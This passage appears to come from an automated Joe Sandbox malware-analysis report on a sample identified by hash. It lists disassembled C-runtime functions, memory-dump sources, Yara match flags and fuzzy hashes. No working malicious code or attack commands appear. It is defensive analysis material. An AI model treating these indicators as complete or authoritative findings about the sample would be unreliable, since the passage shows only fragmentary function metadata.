                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$_memset_sprintf
                    • String ID:
                    • API String ID: 217217746-0
                    • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                    • Instruction ID: a1b2776e440aeae57e4133e346cc94dd9059f47c82e5cb2076854740682a73a6
                    • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                    • Instruction Fuzzy Hash: 1E5160B1D40209AAEF11DFE1DC86FEFBBB9AB04704F100025FA15B61C0D7B5AA05CBA5
                    Function 021FF440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$_memset_sprintf
                    • String ID:
                    • API String ID: 217217746-0
                    • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                    • Instruction ID: 384a43f09b5c8455a7945ec7a00a71d443d0aa71ada8ec44935401c4959b93f7
                    • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                    • Instruction Fuzzy Hash: 80518171D40209AADF21DFE1CC85FEEBBB9EB04704F100129FA15B61C0D774AA068BA5
                    Function 004230C3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 124COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __getbuf__isatty__write
                    • String ID: ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$b+B$f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
                    • API String ID: 2861569966-435740578
                    • Opcode ID: 57fc7c0e07b2605377e585433175daa2ca356cbf327ef2c30275262107639779
                    • Instruction ID: 56eaf7891cc443cda2ad987c43c0ee45a307740aeb36012736d5acc4ed407306
                    • Opcode Fuzzy Hash: 57fc7c0e07b2605377e585433175daa2ca356cbf327ef2c30275262107639779
                    • Instruction Fuzzy Hash: D451E975B00208EFDB14CF94D491AADFBB1FF88325F148299E4456B395D639AE81CF44
                    Function 004207F7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __aulldiv__aullrem_get_int64_arg
                    • String ID: '$0$9
                    • API String ID: 3120068967-269856862
                    • Opcode ID: e56a7eb3272ce188181f6e5f6edba9427cfcd51053dac7488795e72b1c6a7d7e
                    • Instruction ID: 0c2a08fac4f897d903c9e627b79bcfc8308c68c9f95ce268e328b9663556a8e7
                    • Opcode Fuzzy Hash: e56a7eb3272ce188181f6e5f6edba9427cfcd51053dac7488795e72b1c6a7d7e
                    • Instruction Fuzzy Hash: AC41F6B1E06228DFEB24CF48D899BAEB7B5BB44304F5081DAD049A7342C7385E80CF85
                    Function 0041C333 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __errno__invalid_parameter_memset
                    • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
                    • API String ID: 2676528542-322421350
                    • Opcode ID: 8392f66ff3d41f1c16f00270183ba576de8a71c93b90ec51d30d2cb5fe39aeee
                    • Instruction ID: 6938b34caa20a3f2b14d1c5cc6d86a9e15be084191d7924228332fa504890d21
                    • Opcode Fuzzy Hash: 8392f66ff3d41f1c16f00270183ba576de8a71c93b90ec51d30d2cb5fe39aeee
                    • Instruction Fuzzy Hash: 75218E70A8034DDBDF24CF54CC81BEE77A1BB45314F20826AF8266A3D0D7799990CB5A
                    Function 0040B21E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __errno__invalid_parameter_memset
                    • String ID: (_HEAP_MAXREQ / nNum) >= nSize$_calloc_dbg_impl$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                    • API String ID: 2676528542-1805389939
                    • Opcode ID: 1a425d2f92034670c09c0964b76625d23b1f951a62c574b04016fffd725c07a2
                    • Instruction ID: eb84a5167b17333ba3e3b1c4978ca2467f65e81188ffa62ae13999149fa73c65
                    • Opcode Fuzzy Hash: 1a425d2f92034670c09c0964b76625d23b1f951a62c574b04016fffd725c07a2
                    • Instruction Fuzzy Hash: D11186B1A40208BBDB00EF94CC86F9E3765EB54754F20C16AF919BB2D1D778DA90C798
                    Function 0041C2A5 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 39COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __errno__invalid_parameter
                    • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$u!h(p@
                    • API String ID: 3025725278-4121847016
                    • Opcode ID: 796a7ebb5b5a152954a7a9b1ee43529bba00c8f011c39cc91f6535537934007b
                    • Instruction ID: fd1876f43b06cd5cf3dc85d122bfae1735d872de4d4a998f415e04492ea7423f
                    • Opcode Fuzzy Hash: 796a7ebb5b5a152954a7a9b1ee43529bba00c8f011c39cc91f6535537934007b
                    • Instruction Fuzzy Hash: DF018174E8030D9BEB205EC0CC467EB7260AB10718F10456BF524352C1C3FD56D4CA9E
                    Function 0223208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                    • String ID:
                    • API String ID: 3534693527-0
                    • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                    • Instruction ID: 695a96c0ea77b53cd965efd9e88d8aae91d41011a6de80c172562a99c05a6d47
                    • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                    • Instruction Fuzzy Hash: F331D6B2930326EADB236FE49C00F6E27A59F65B24F104215ED04EB29CDB748D45CAA1
                    Function 022B66D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                    • __getptd_noexit.LIBCMT ref: 022B66DD
                      • Part of subcall function 022159BF: __calloc_crt.LIBCMT ref: 022159E2
                      • Part of subcall function 022159BF: __initptd.LIBCMT ref: 02215A04
                    • __calloc_crt.LIBCMT ref: 022B6700
                    • __get_sys_err_msg.LIBCMT ref: 022B671E
                    • __invoke_watson.LIBCMT ref: 022B673B
                    • __get_sys_err_msg.LIBCMT ref: 022B676D
                    • __invoke_watson.LIBCMT ref: 022B678B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                    • String ID:
                    • API String ID: 4066021419-0
                    • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                    • Instruction ID: a1a01c6537740ab48b720c1b1b722aef7152de443fd175dee768dd49339fd679
                    • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                    • Instruction Fuzzy Hash: B611B2716207156BEB227EE5DC01FFA73CDDF107E0B000466FD0896A48E725D9419AE5
                    Function 0041F350 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___initconout.LIBCMTD ref: 0041F374
                      • Part of subcall function 00422F20: CreateFileA.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,?,0041F379), ref: 00422F39
                    • GetConsoleOutputCP.KERNEL32(00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 0041F3F9
                    • WideCharToMultiByte.KERNEL32(00000000), ref: 0041F400
                    • WriteConsoleA.KERNEL32(FFFFFFFE,00000000,?,?,00000000), ref: 0041F427
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
                    • String ID:
                    • API String ID: 3432720595-0
                    • Opcode ID: 72a48acd586b71baba4387eae609bd6ad9dc96016b94740502e9773699c76f58
                    • Instruction ID: b9c53f5695eff355306f17db5dc82dd9e26459cf91b60b5c83291f424c3fb011
                    • Opcode Fuzzy Hash: 72a48acd586b71baba4387eae609bd6ad9dc96016b94740502e9773699c76f58
                    • Instruction Fuzzy Hash: 1021A630500209EBDB20DF68ED48BEB7774AB15310F50433AE615D62E0E778498BDB5D
                    Function 004109F1 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 123COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c, xrefs: 00410B16
                    • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 00410B0A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __getbuf__isatty__write
                    • String ID: ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
                    • API String ID: 2861569966-4070537404
                    • Opcode ID: e9dd0a46bbeb45c13412baef9fb23bba1372573d134932202060820dcc42dae2
                    • Instruction ID: 0884ae2ef80389515601afab3c409a3b1e83e4dddcfc3ca24bd1565b3c9c729a
                    • Opcode Fuzzy Hash: e9dd0a46bbeb45c13412baef9fb23bba1372573d134932202060820dcc42dae2
                    • Instruction Fuzzy Hash: 8C51D875A00208EFDB14CF94C495AAEFBB1FF88324F14C299E4456B396D675AAC1CF44
                    Function 004207E4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __aulldiv__aullrem_get_int64_arg
                    • String ID: 0$9
                    • API String ID: 3120068967-1975997740
                    • Opcode ID: 6ae24b264fc982656064a7f7578f12dc2f4af9ef85f3182b800ea4c7ffe1b027
                    • Instruction ID: 96e5b756381035dd94b9114745309f392aa6393090800c7ca6614f1d2d1fa282
                    • Opcode Fuzzy Hash: 6ae24b264fc982656064a7f7578f12dc2f4af9ef85f3182b800ea4c7ffe1b027
                    • Instruction Fuzzy Hash: 8D41E5B1E06228DFEB64CF48D899BAEB7B5BB44304F5081DAD049A7342C7385E81CF85
                    Function 00422099 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __aulldiv__aullrem_get_int64_arg
                    • String ID: '$9
                    • API String ID: 3120068967-1823400153
                    • Opcode ID: 909b79ec3f35dcdc6c11d4c17450f5894463073a3970c0ccf8cc16f4c027ed90
                    • Instruction ID: b7b4cf27b037ec20687740e957cfa5ac14def52df85efec882c8ee62b8aa92ad
                    • Opcode Fuzzy Hash: 909b79ec3f35dcdc6c11d4c17450f5894463073a3970c0ccf8cc16f4c027ed90
                    • Instruction Fuzzy Hash: 114127B1A00129EFDB24CF48DA41BAEB7B5FF85314F5041DAD248A7241C7B95E81CF5A
                    Function 0041BDC6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __errno__invalid_parameter
                    • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$pwcs != NULL
                    • API String ID: 3025725278-2632876063
                    • Opcode ID: 62b840fc57d355b7b1be22696e1cade7d12b56cc3628eec8658c617ee49348e4
                    • Instruction ID: d7c50efe4e4eae3a018a2ae1f885732d63bc595a5f0fb65b0b3b46cceda007fb
                    • Opcode Fuzzy Hash: 62b840fc57d355b7b1be22696e1cade7d12b56cc3628eec8658c617ee49348e4
                    • Instruction Fuzzy Hash: A0F0C2B0F90309AAEB206EA0FC47BDB31A0AB14768F21056BF516351C1C7FD45E4869D
                    Function 0041A9C8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __errno__invalid_parameter
                    • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c$format != NULL
                    • API String ID: 3025725278-3373716590
                    • Opcode ID: abe79a8b7f1d4110802d67d7d141114f111e7ae0c499e1617a3f2e38988b7575
                    • Instruction ID: 9b6ae2e3e15df422b9d416976cc69e383dbabf68712902fb2fce08e135916ea2
                    • Opcode Fuzzy Hash: abe79a8b7f1d4110802d67d7d141114f111e7ae0c499e1617a3f2e38988b7575
                    • Instruction Fuzzy Hash: 32E04FB0FC570869F62025555C07F9631204B61B29F6246A7B61A781C399FD94B0066F
                    Function 02202670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: D
                    • API String ID: 2102423945-2746444292
                    • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                    • Instruction ID: 5fe00ef4ad02e739cc46648cd8e8502336671d6b29334d86f4603f13dbb0f8cc
                    • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                    • Instruction Fuzzy Hash: 26E15C71D1021AEACF24DFE0CD89FEEB7B8BF04304F14416AE909A6195EB74AA45CF54
                    Function 021FD8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: $$$(
                    • API String ID: 2102423945-3551151888
                    • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                    • Instruction ID: 7ba4d8c9879071ec04ff35066f14cfd7489c099ef233c152e20263f0259b3cfa
                    • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                    • Instruction Fuzzy Hash: A291DF71C40218EAEF20DFA0DC59BEEBBB5AF06308F144169D525772C1DBB25A48CFA5
                    Function 00422086 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: __aulldiv__aullrem_get_int64_arg
                    • String ID: 9
                    • API String ID: 3120068967-2366072709
                    • Opcode ID: 40a14e90d8722b5b75b12af3c5012a0fe5a1f8c4d1ad9186d0f6d0138da2f85b
                    • Instruction ID: d3160465ee4e192b83d61e8c48ea80e276e12c9f82d81e7aedc59fc20a836f41
                    • Opcode Fuzzy Hash: 40a14e90d8722b5b75b12af3c5012a0fe5a1f8c4d1ad9186d0f6d0138da2f85b
                    • Instruction Fuzzy Hash: 774117B1E00129EFDB24CF48DA41BAEB7B5FF85314F5041DAD248AB241C7B95A81CF5A
